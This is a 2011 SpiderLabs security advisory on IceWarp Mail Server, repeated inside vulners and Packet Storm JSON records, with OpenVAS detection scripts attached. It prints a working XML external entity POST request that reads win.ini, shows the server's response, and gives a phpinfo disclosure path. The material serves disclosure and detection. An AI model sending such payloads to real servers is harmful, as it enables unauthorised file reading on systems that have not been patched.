Trustwave's SpiderLabs Security Advisory TWSL2011-013:
Multiple Vulnerabilities in IceWarp Mail Server
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt
Published: 2011-09-23
Version: 1.0
Vendor: IceWarp (http://www.icewarp.com)
Product: IceWarp Mail Server
Version affected: 10.3.2 and below
Product description: IceWarp WebMail is the web front-end for the IceWarp
Mail Server, which provides email access on over 50,000 servers. IceWarp
WebMail provides web-based access to email, calendars, contacts, files
and shared data from any computer with a browser and Internet connection.
Credit: David Kirkpatrick of Trustwave's SpiderLabs
Finding 1: XML External Entity Injection
CVE: CVE-2011-3579
An external entity is a function of the XML specification which allows XML
documents to reference resources external to the XML document. This
functionality forces the XML parser of the application to access the
resource specified.
In this case it is possible to inject an XML DOCTYPE "SYSTEM" directive to
access local files on the operating system where the IceWarp server is
installed. Using this technique it is possible to retrieve readable files
on the operating system. This attack can also be used to create a possible
denial of service condition.
Proof-of-Concept:
The following POST request was sent to the host A.B.C.D where the IceWarp
mail server was running:
REQUEST
=========
POST /-.._._.--.._1243848280/server/webmail.php HTTP/1.1
Host:A.B.C.D User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0)
Gecko/20100101 Firefox/5.0
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language:en-gb,en;q=0.5i've
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D
Content-Length: 249
Content-Type: application/xml;charset=UTF-8
Pragma: no-cache
Cache-Control: no-cache
<!DOCTYPE foo [<!ENTITY xxeb91c4 SYSTEM "file:///c:/windows/win.ini"> ]><iq
type="set"><query
xmlns="webmail:iq:auth"><username>test&xxeb91c4;</username><digest>828cd27c
6fb73ee32674602e9c5521f005c614f5fb9266fd071dab323b5079e02d47a421c01df2efffc
d2bdb221e15bf2baa4acefe38f264d92d152878ca4d33</digest><method>RSA</method><
/query></iq>
RESPONSE:
==========
HTTP/1.1 200 OK
Server: IceWarp/9.4.2
Date: Wed, 20 Jul 2011 10:04:56 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control:no-store, no-cache, must-revalidate, post-check=0,
pre-check=0 Pragma: no-cache
Content-Type: text/xml
Vary: Accept-Encoding
Content-Length: 1113
<?xml version="1.0" encoding="utf-8"?><iq type="error"><error
uid="login_invalid">test; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
...TRUNCATED
The above proof-of-concept would retrieve the c:\windows\win.ini file (the
response in this example has been truncated).
Finding 2: PHP Information Disclosure
CVE: CVE-2011-3580
It is possible to retrieve the PHP information file phpinfo() by accessing
the following URL http://A.B.C.D/server where A.B.C.D is the IP of the
server running the IceWarp software. The response will be a page detailing
the PHP version used and the configuration settings of PHP, including
system details.
Vendor Response: These issues have been addressed as of version 10.3.3
Remediation Steps: Customers should update to the latest version of IceWarp
Mail Server in order to address these issues. The above issues have been
corrected in version 10.3.3.
Revision History:
08/03/11 - Vulnerability disclosed
09/19/11 - Patch released
09/23/11 - Advisory published
About Trustwave: Trustwave is the leading provider of on-demand and
subscription-based information security and payment card industry
compliance management solutions to businesses and government entities
throughout the world. For organizations faced with today's challenging
data security and compliance environment, Trustwave provides a unique
approach with comprehensive solutions that include its flagship
TrustKeeper compliance management software and other proprietary security
solutions. Trustwave has helped thousands of organizations--ranging from
Fortune 500 businesses and large financial institutions to small and
medium-sized retailers--manage compliance and secure their network
infrastructure, data communications and critical information assets.
Trustwave is headquartered in Chicago with offices throughout North
America, South America, Europe, Africa, China and Australia. For more
information, visit https://www.trustwave.com
About Trustwave's SpiderLabs: SpiderLabs is the advance security team at
Trustwave responsible for incident response and forensics, ethical hacking
and application security tests for Trustwave's clients. SpiderLabs has
responded to hundreds of security incidents, performed thousands of ethical
hacking exercises and tested the security of hundreds of business
applications for Fortune 500 organizations. For more information visit
https://www.trustwave.com/spiderlabs
Disclaimer: The information provided in this advisory is provided "as is"
without warranty of any kind. Trustwave disclaims all warranties, either
express or implied, including the warranties of merchantability and fitness
for a particular purpose. In no event shall Trustwave or its suppliers be
liable for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.
{"id": "SECURITYVULNS:DOC:27071", "bulletinFamily": "software", "title": "TWSL2011-013: Multiple Vulnerabilities in IceWarp Mail Server", "description": "Trustwave's SpiderLabs Security Advisory TWSL2011-013:\r\nMultiple Vulnerabilities in IceWarp Mail Server\r\n\r\nhttps://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt\r\n\r\nPublished: 2011-09-23\r\nVersion: 1.0\r\n\r\nVendor: IceWarp (http://www.icewarp.com)\r\nProduct: IceWarp Mail Server\r\nVersion affected: 10.3.2 and below\r\n\r\nProduct description: IceWarp WebMail is the web front-end for the IceWarp\r\nMail Server, which provides email access on over 50,000 servers. IceWarp\r\nWebMail provides web-based access to email, calendars, contacts, files\r\nand shared data from any computer with a browser and Internet connection.\r\n\r\nCredit: David Kirkpatrick of Trustwave's SpiderLabs\r\n\r\nFinding 1: XML External Entity Injection\r\nCVE: CVE-2011-3579\r\n\r\nAn external entity is a function of the XML specification which allows XML\r\ndocuments to reference resources external to the XML document. This\r\nfunctionality forces the XML parser of the application to access the\r\nresource specified.\r\n\r\nIn this case it is possible to inject an XML DOCTYPE "SYSTEM" directive to\r\naccess local files on the operating system where the IceWarp server is\r\ninstalled. Using this technique it is possible to retrieve readable files\r\non the operating system. This attack can also be used to create a possible\r\ndenial of service condition.\r\n\r\nProof-of-Concept:\r\n\r\nThe following POST request was sent to the host A.B.C.D where the IceWarp\r\nmail server was running:\r\n\r\nREQUEST\r\n=========\r\nPOST /-.._._.--.._1243848280/server/webmail.php HTTP/1.1\r\nHost:A.B.C.D User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0)\r\nGecko/20100101 Firefox/5.0\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language:en-gb,en;q=0.5i've\r\nAccept-Encoding: gzip, deflate\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nProxy-Connection: keep-alive\r\nReferer: http://A.B.C.D\r\nContent-Length: 249\r\nContent-Type: application/xml;charset=UTF-8\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n<!DOCTYPE foo [<!ENTITY xxeb91c4 SYSTEM "file:///c:/windows/win.ini"> ]><iq\r\ntype="set"><query\r\nxmlns="webmail:iq:auth"><username>test&xxeb91c4;</username><digest>828cd27c\r\n6fb73ee32674602e9c5521f005c614f5fb9266fd071dab323b5079e02d47a421c01df2efffc\r\nd2bdb221e15bf2baa4acefe38f264d92d152878ca4d33</digest><method>RSA</method><\r\n/query></iq>\r\n\r\nRESPONSE:\r\n==========\r\nHTTP/1.1 200 OK\r\nServer: IceWarp/9.4.2\r\nDate: Wed, 20 Jul 2011 10:04:56 GMT\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control:no-store, no-cache, must-revalidate, post-check=0,\r\npre-check=0 Pragma: no-cache\r\nContent-Type: text/xml\r\nVary: Accept-Encoding\r\nContent-Length: 1113\r\n\r\n<?xml version="1.0" encoding="utf-8"?><iq type="error"><error\r\nuid="login_invalid">test; for 16-bit app support\r\n[fonts]\r\n[extensions]\r\n[mci extensions]\r\n[files]\r\n[Mail]\r\nMAPI=1\r\n...TRUNCATED\r\n\r\nThe above proof-of-concept would retrieve the c:\windows\win.ini file (the\r\nresponse in this example has been truncated).\r\n\r\n\r\nFinding 2: PHP Information Disclosure\r\nCVE: CVE-2011-3580\r\n\r\nIt is possible to retrieve the PHP information file phpinfo() by accessing\r\nthe following URL http://A.B.C.D/server where A.B.C.D is the IP of the\r\nserver running the IceWarp software. The response will be a page detailing\r\nthe PHP version used and the configuration settings of PHP, including\r\nsystem details.\r\n\r\n\r\nVendor Response: These issues have been addressed as of version 10.3.3\r\n\r\nRemediation Steps: Customers should update to the latest version of IceWarp\r\nMail Server in order to address these issues. The above issues have been\r\ncorrected in version 10.3.3.\r\n\r\nRevision History:\r\n08/03/11 - Vulnerability disclosed\r\n09/19/11 - Patch released\r\n09/23/11 - Advisory published\r\n\r\n\r\nAbout Trustwave: Trustwave is the leading provider of on-demand and\r\nsubscription-based information security and payment card industry\r\ncompliance management solutions to businesses and government entities\r\nthroughout the world. For organizations faced with today's challenging\r\ndata security and compliance environment, Trustwave provides a unique\r\napproach with comprehensive solutions that include its flagship\r\nTrustKeeper compliance management software and other proprietary security\r\nsolutions. Trustwave has helped thousands of organizations--ranging from\r\nFortune 500 businesses and large financial institutions to small and\r\nmedium-sized retailers--manage compliance and secure their network\r\ninfrastructure, data communications and critical information assets.\r\nTrustwave is headquartered in Chicago with offices throughout North\r\nAmerica, South America, Europe, Africa, China and Australia. For more\r\ninformation, visit https://www.trustwave.com\r\n\r\nAbout Trustwave's SpiderLabs: SpiderLabs is the advance security team at\r\nTrustwave responsible for incident response and forensics, ethical hacking\r\nand application security tests for Trustwave's clients. SpiderLabs has\r\nresponded to hundreds of security incidents, performed thousands of ethical\r\nhacking exercises and tested the security of hundreds of business\r\napplications for Fortune 500 organizations. For more information visit\r\nhttps://www.trustwave.com/spiderlabs\r\n\r\nDisclaimer: The information provided in this advisory is provided "as is"\r\nwithout warranty of any kind. Trustwave disclaims all warranties, either\r\nexpress or implied, including the warranties of merchantability and fitness\r\nfor a particular purpose. In no event shall Trustwave or its suppliers be\r\nliable for any damages whatsoever including direct, indirect, incidental,\r\nconsequential, loss of business profits or special damages, even if\r\nTrustwave or its suppliers have been advised of the possibility of such\r\ndamages. Some states do not allow the exclusion or limitation of liability\r\nfor consequential or incidental damages so the foregoing limitation may not\r\napply.\r\n\r\n\r\n\r\n\r\n\r\nThis transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.\r\n", "published": "2011-09-26T00:00:00", "modified": "2011-09-26T00:00:00", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27071", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2011-3580", "CVE-2011-3579"], "type": "securityvulns", "lastseen": "2018-08-31T11:10:42", "edition": 1, "viewCount": 30, "enchantments": {"score": {"value": 0.2, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-3579", "CVE-2011-3580"]}, {"type": "openvas", "idList": ["OPENVAS:103279", "OPENVAS:1361412562310103279", "OPENVAS:1361412562310902478"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:105320"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11920"]}], "rev": 4}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2011-3579", "CVE-2011-3580"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:105320"]}]}, "exploitation": null, "vulnersScore": 0.2}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647589307, "score": 1659730939}}
{"openvas": [{"lastseen": "2019-05-29T18:39:28", "description": "The host is running IceWarp Mail Server and is prone to xml entity injection\nand information disclosure vulnerability.\n\nThe flaws are due to:\n\n - Certain input passed via SOAP messages to ", "cvss3": {}, "published": "2011-09-27T00:00:00", "type": "openvas", "title": "IceWarp Mail Server XML Entity Injection and Information Disclosure Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3580", "CVE-2011-3579"], "modified": "2018-10-20T00:00:00", "id": "OPENVAS:1361412562310902478", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902478", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_icewarp_mail_server_xml_inj_n_info_disc_vuln.nasl 11997 2018-10-20 11:59:41Z mmartin $\n#\n# IceWarp Mail Server XML Entity Injection and Information Disclosure Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:icewarp:mail_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902478\");\n script_version(\"$Revision: 11997 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-20 13:59:41 +0200 (Sat, 20 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-09-27 17:29:53 +0200 (Tue, 27 Sep 2011)\");\n script_cve_id(\"CVE-2011-3579\", \"CVE-2011-3580\");\n script_bugtraq_id(49753);\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_name(\"IceWarp Mail Server XML Entity Injection and Information Disclosure Vulnerability\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/46135/\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/70026\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/70025\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.org/files/view/105320/TWSL2011-013.txt\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 SecPod\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_icewarp_web_detect.nasl\");\n script_mandatory_keys(\"icewarp/installed\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to gain access to potentially\nsensitive information, and possibly cause denial-of-service conditions. Other attacks may also be possible.\");\n\n script_tag(name:\"affected\", value:\"IceWarp Mail Server 10.3.2 and prior.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to IceWarp Mail Server 10.3.3 or later.\");\n\n script_tag(name:\"summary\", value:\"The host is running IceWarp Mail Server and is prone to xml entity injection\nand information disclosure vulnerability.\n\nThe flaws are due to:\n\n - Certain input passed via SOAP messages to 'server/webmail.php' is not properly verified before being used. This\ncan be exploited to disclose the contents of arbitrary files.\n\n - An unspecified script, which calls the 'phpinfo()' function, is stored with insecure permissions inside the web\nroot. This can be exploited to gain knowledge of sensitive information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.icewarp.com\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif (!port = get_app_port(cpe: CPE, service: \"www\"))\n exit(0);\n\nif (!icewarp = get_app_version(cpe:CPE, port:port))\n exit(0);\n\nif (version_is_less(version: icewarp, test_version: \"10.3.3\")) {\n report = report_fixed_ver(installed_version: icewarp, fixed_version: \"10.3.3\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2017-07-27T10:55:29", "description": "IceWarp Web Mail is prone to multiple information-disclosure\nvulnerabilities.\n\nAttackers can exploit these issues to gain access to potentially\nsensitive information, and possibly cause denial-of-service\nconditions; other attacks may also be possible.", "cvss3": {}, "published": "2011-09-28T00:00:00", "type": "openvas", "title": "IceWarp Web Mail Multiple Information Disclosure Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3580", "CVE-2011-3579"], "modified": "2017-07-12T00:00:00", "id": "OPENVAS:103279", "href": "http://plugins.openvas.org/nasl.php?oid=103279", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_IceWarp_49753.nasl 6696 2017-07-12 11:30:15Z cfischer $\n#\n# IceWarp Web Mail Multiple Information Disclosure Vulnerabilities\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"IceWarp Web Mail is prone to multiple information-disclosure\nvulnerabilities.\n\nAttackers can exploit these issues to gain access to potentially\nsensitive information, and possibly cause denial-of-service\nconditions; other attacks may also be possible.\";\n\ntag_solution = \"Vendor updates are available. Please see the references for more\ninformation.\";\n\nif (description)\n{\n script_id(103279);\n script_version(\"$Revision: 6696 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 13:30:15 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-09-28 12:51:43 +0200 (Wed, 28 Sep 2011)\");\n script_bugtraq_id(49753);\n script_cve_id(\"CVE-2011-3579\",\"CVE-2011-3580\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n\n script_name(\"IceWarp Web Mail Multiple Information Disclosure Vulnerabilities\");\n\n script_xref(name : \"URL\" , value : \"http://www.securityfocus.com/bid/49753\");\n script_xref(name : \"URL\" , value : \"http://www.icewarp.com/Products/IceWarp_Web_Mail/\");\n script_xref(name : \"URL\" , value : \"https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2011 Greenbone Networks GmbH\");\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"IceWarp/banner\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port(default:80);\nif(!can_host_php(port:port))exit(0);\n\nbanner = get_http_banner(port:port);\nif(!banner || \"IceWarp\" >!< banner)exit(0);\n\nforeach dir( make_list_unique( \"/webmail\", cgi_dirs( port:port ) ) ) {\n\n if( dir == \"/\" ) dir = \"\";\n url = string(dir, \"/server/\"); \n\n if(http_vuln_check(port:port, url:url,pattern:\"<title>phpinfo\\(\\)\")) {\n report = report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2020-05-08T19:10:45", "description": "IceWarp Web Mail is prone to multiple information-disclosure\n vulnerabilities.", "cvss3": {}, "published": "2011-09-28T00:00:00", "type": "openvas", "title": "IceWarp Web Mail Multiple Information Disclosure Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3580", "CVE-2011-3579"], "modified": "2020-05-06T00:00:00", "id": "OPENVAS:1361412562310103279", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103279", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# IceWarp Web Mail Multiple Information Disclosure Vulnerabilities\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2011 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103279\");\n script_version(\"2020-05-06T13:14:18+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-06 13:14:18 +0000 (Wed, 06 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-09-28 12:51:43 +0200 (Wed, 28 Sep 2011)\");\n script_bugtraq_id(49753);\n script_cve_id(\"CVE-2011-3579\", \"CVE-2011-3580\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_name(\"IceWarp Web Mail Multiple Information Disclosure Vulnerabilities\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_dependencies(\"gb_get_http_banner.nasl\", \"no404.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"IceWarp/banner\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/49753\");\n script_xref(name:\"URL\", value:\"https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt\");\n\n script_tag(name:\"summary\", value:\"IceWarp Web Mail is prone to multiple information-disclosure\n vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Attackers can exploit these issues to gain access to potentially\n sensitive information, and possibly cause denial-of-service conditions. Other attacks may also be possible.\");\n\n script_tag(name:\"solution\", value:\"Vendor updates are available. Please see the references for more\n information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = http_get_port( default:80 );\nif( ! http_can_host_php( port:port ) ) exit( 0 );\n\nbanner = http_get_remote_headers( port:port );\nif( ! banner || \"IceWarp\" >!< banner ) exit( 0 );\n\nforeach dir( make_list_unique( \"/webmail\", http_cgi_dirs( port:port ) ) ) {\n\n if( dir == \"/\" ) dir = \"\";\n url = dir + \"/server/\";\n\n if( http_vuln_check( port:port, url:url, pattern:\"<title>phpinfo\\(\\)\", usecache:TRUE ) ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:17:52", "description": "", "cvss3": {}, "published": "2011-09-23T00:00:00", "type": "packetstorm", "title": "IceWarp Mail Server Injection / Information Disclosure", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2011-3580", "CVE-2011-3579"], "modified": "2011-09-23T00:00:00", "id": "PACKETSTORM:105320", "href": "https://packetstormsecurity.com/files/105320/IceWarp-Mail-Server-Injection-Information-Disclosure.html", "sourceData": "`Trustwave's SpiderLabs Security Advisory TWSL2011-013: \nMultiple Vulnerabilities in IceWarp Mail Server \n \nhttps://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt \n \nPublished: 2011-09-23 \nVersion: 1.0 \n \nVendor: IceWarp (http://www.icewarp.com) \nProduct: IceWarp Mail Server \nVersion affected: 10.3.2 and below \n \nProduct description: IceWarp WebMail is the web front-end for the IceWarp \nMail Server, which provides email access on over 50,000 servers. IceWarp \nWebMail provides web-based access to email, calendars, contacts, files \nand shared data from any computer with a browser and Internet connection. \n \nCredit: David Kirkpatrick of Trustwave's SpiderLabs \n \nFinding 1: XML External Entity Injection \nCVE: CVE-2011-3579 \n \nAn external entity is a function of the XML specification which allows XML \ndocuments to reference resources external to the XML document. This \nfunctionality forces the XML parser of the application to access the \nresource specified. \n \nIn this case it is possible to inject an XML DOCTYPE \"SYSTEM\" directive to \naccess local files on the operating system where the IceWarp server is \ninstalled. Using this technique it is possible to retrieve readable files \non the operating system. This attack can also be used to create a possible \ndenial of service condition. \n \nProof-of-Concept: \n \nThe following POST request was sent to the host A.B.C.D where the IceWarp \nmail server was running: \n \nREQUEST \n========= \nPOST /-.._._.--.._1243848280/server/webmail.php HTTP/1.1 \nHost:A.B.C.D User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) \nGecko/20100101 Firefox/5.0 \nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language:en-gb,en;q=0.5i've \nAccept-Encoding: gzip, deflate \nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 \nProxy-Connection: keep-alive \nReferer: http://A.B.C.D \nContent-Length: 249 \nContent-Type: application/xml;charset=UTF-8 \nPragma: no-cache \nCache-Control: no-cache \n \n<!DOCTYPE foo [<!ENTITY xxeb91c4 SYSTEM \"file:///c:/windows/win.ini\"> ]><iq \ntype=\"set\"><query \nxmlns=\"webmail:iq:auth\"><username>test&xxeb91c4;</username><digest>828cd27c \n6fb73ee32674602e9c5521f005c614f5fb9266fd071dab323b5079e02d47a421c01df2efffc \nd2bdb221e15bf2baa4acefe38f264d92d152878ca4d33</digest><method>RSA</method>< \n/query></iq> \n \nRESPONSE: \n========== \nHTTP/1.1 200 OK \nServer: IceWarp/9.4.2 \nDate: Wed, 20 Jul 2011 10:04:56 GMT \nExpires: Thu, 19 Nov 1981 08:52:00 GMT \nCache-Control:no-store, no-cache, must-revalidate, post-check=0, \npre-check=0 Pragma: no-cache \nContent-Type: text/xml \nVary: Accept-Encoding \nContent-Length: 1113 \n \n<?xml version=\"1.0\" encoding=\"utf-8\"?><iq type=\"error\"><error \nuid=\"login_invalid\">test; for 16-bit app support \n[fonts] \n[extensions] \n[mci extensions] \n[files] \n[Mail] \nMAPI=1 \n....TRUNCATED \n \nThe above proof-of-concept would retrieve the c:\\windows\\win.ini file (the \nresponse in this example has been truncated). \n \n \nFinding 2: PHP Information Disclosure \nCVE: CVE-2011-3580 \n \nIt is possible to retrieve the PHP information file phpinfo() by accessing \nthe following URL http://A.B.C.D/server where A.B.C.D is the IP of the \nserver running the IceWarp software. The response will be a page detailing \nthe PHP version used and the configuration settings of PHP, including \nsystem details. \n \n \nVendor Response: These issues have been addressed as of version 10.3.3 \n \nRemediation Steps: Customers should update to the latest version of IceWarp \nMail Server in order to address these issues. The above issues have been \ncorrected in version 10.3.3. \n \nRevision History: \n08/03/11 - Vulnerability disclosed \n09/19/11 - Patch released \n09/23/11 - Advisory published \n \n \nAbout Trustwave: Trustwave is the leading provider of on-demand and \nsubscription-based information security and payment card industry \ncompliance management solutions to businesses and government entities \nthroughout the world. For organizations faced with today's challenging \ndata security and compliance environment, Trustwave provides a unique \napproach with comprehensive solutions that include its flagship \nTrustKeeper compliance management software and other proprietary security \nsolutions. Trustwave has helped thousands of organizations--ranging from \nFortune 500 businesses and large financial institutions to small and \nmedium-sized retailers--manage compliance and secure their network \ninfrastructure, data communications and critical information assets. \nTrustwave is headquartered in Chicago with offices throughout North \nAmerica, South America, Europe, Africa, China and Australia. For more \ninformation, visit https://www.trustwave.com \n \nAbout Trustwave's SpiderLabs: SpiderLabs is the advance security team at \nTrustwave responsible for incident response and forensics, ethical hacking \nand application security tests for Trustwave's clients. SpiderLabs has \nresponded to hundreds of security incidents, performed thousands of ethical \nhacking exercises and tested the security of hundreds of business \napplications for Fortune 500 organizations. For more information visit \nhttps://www.trustwave.com/spiderlabs \n \nDisclaimer: The information provided in this advisory is provided \"as is\" \nwithout warranty of any kind. Trustwave disclaims all warranties, either \nexpress or implied, including the warranties of merchantability and fitness \nfor a particular purpose. In no event shall Trustwave or its suppliers be \nliable for any damages whatsoever including direct, indirect, incidental, \nconsequential, loss of business profits or special damages, even if \nTrustwave or its suppliers have been advised of the possibility of such \ndamages. Some states do not allow the exclusion or limitation of liability \nfor consequential or incidental damages so the foregoing limitation may not \napply. \n \n \n \n \nThis transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format. \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/105320/TWSL2011-013.txt", "cvss": {"score": 6.4, 